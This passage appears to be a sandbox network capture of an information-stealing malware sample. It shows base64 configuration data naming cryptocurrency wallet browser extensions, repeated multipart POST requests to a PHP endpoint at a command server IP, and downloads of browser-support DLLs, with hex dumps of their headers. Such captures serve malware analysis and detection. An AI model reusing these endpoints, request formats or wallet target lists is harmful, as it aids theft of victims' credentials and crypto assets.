rZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhb
Apr 23, 2024 09:26:56.219472885 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
Apr 23, 2024 09:26:56.219482899 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 23, 2024 09:26:56.219492912 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 23, 2024 09:26:56.219505072 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 23, 2024 09:26:56.240521908 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ Host: 185.172.128.111 Content-Length: 5455 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:26:56.240523100 CEST	5455	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 38 63 36 65 Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"958c6e1ca5de899071f18a6ac4dc33c92762fb2765d862dda440aa63685631b0723d92e0------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 23, 2024 09:26:56.822256088 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:26:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:26:57.077724934 CEST	94	OUT	GET /8e6d9db21fb63946/sqlite3.dll HTTP/1.1 Host: 185.172.128.111 Cache-Control: no-cache
Apr 23, 2024 09:26:57.389849901 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:26:57 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Apr 23, 2024 09:26:57.389892101 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 23, 2024 09:26:57.389929056 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 23, 2024 09:26:57.389966965 CEST	233	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU
Apr 23, 2024 09:26:57.390115976 CEST	1289	IN	Data Raw: 24 ff d2 c9 c3 31 c0 c3 55 85 c0 89 e5 74 10 8b 88 0c 01 00 00 85 c9 74 06 ff 41 24 89 51 0c 89 d0 5d c3 85 c0 74 4d 0f b6 08 80 b9 e0 a1 ec 61 00 89 ca 79 3f 55 80 f9 5b b1 5d 0f 44 d1 b9 01 00 00 00 89 e5 57 56 53 be 01 00 00 00 8a 1c 08 8d 7e Data Ascii: $1UttA$Q]tMay?U[]DWVS~8u:TuT0A\0AF[8^_]UVS149uuaa)uC[^]UEUu1t]]UWVMSU}u1K
Apr 23, 2024 09:27:00.047056913 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII Host: 185.172.128.111 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:00.578917980 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:00.675652027 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH Host: 185.172.128.111 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:01.143585920 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:01.163347960 CEST	561	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGH Host: 185.172.128.111 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 38 63 36 65 31 63 61 35 64 65 38 39 39 30 37 31 66 31 38 61 36 61 63 34 64 63 33 33 63 39 32 37 36 32 66 62 32 37 36 35 64 38 36 32 64 64 61 34 34 30 61 61 36 33 36 38 35 36 33 31 62 30 37 32 33 64 39 32 65 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4d 54 45 34 4d 54 67 78 4e 54 55 75 5a 6d 6c 73 5a 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 2d 2d 0d 0a Data Ascii: ------CBAKJEHDBGHIEBGCGDGHContent-Disposition: form-data; name="token"958c6e1ca5de899071f18a6ac4dc33c92762fb2765d862dda440aa63685631b0723d92e0------CBAKJEHDBGHIEBGCGDGHContent-Disposition: form-data; name="file_name"MTE4MTgxNTUuZmlsZQ==------CBAKJEHDBGHIEBGCGDGHContent-Disposition: form-data; name="file"------CBAKJEHDBGHIEBGCGDGH--
Apr 23, 2024 09:27:01.562393904 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:01.854197979 CEST	561	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHI Host: 185.172.128.111 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 38 63 36 65 31 63 61 35 64 65 38 39 39 30 37 31 66 31 38 61 36 61 63 34 64 63 33 33 63 39 32 37 36 32 66 62 32 37 36 35 64 38 36 32 64 64 61 34 34 30 61 61 36 33 36 38 35 36 33 31 62 30 37 32 33 64 39 32 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4d 54 45 34 4d 54 67 78 4e 54 55 75 5a 6d 6c 73 5a 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 2d 2d 0d 0a Data Ascii: ------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="token"958c6e1ca5de899071f18a6ac4dc33c92762fb2765d862dda440aa63685631b0723d92e0------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="file_name"MTE4MTgxNTUuZmlsZQ==------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="file"------JJJECFIECBGDGCAAAEHI--
Apr 23, 2024 09:27:02.187139988 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:02.348217964 CEST	94	OUT	GET /8e6d9db21fb63946/freebl3.dll HTTP/1.1 Host: 185.172.128.111 Cache-Control: no-cache
Apr 23, 2024 09:27:02.656657934 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:02 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Apr 23, 2024 09:27:03.954360008 CEST	94	OUT	GET /8e6d9db21fb63946/mozglue.dll HTTP/1.1 Host: 185.172.128.111 Cache-Control: no-cache
Apr 23, 2024 09:27:04.264525890 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:04 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Apr 23, 2024 09:27:05.077260971 CEST	95	OUT	GET /8e6d9db21fb63946/msvcp140.dll HTTP/1.1 Host: 185.172.128.111 Cache-Control: no-cache
Apr 23, 2024 09:27:05.385685921 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:05 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 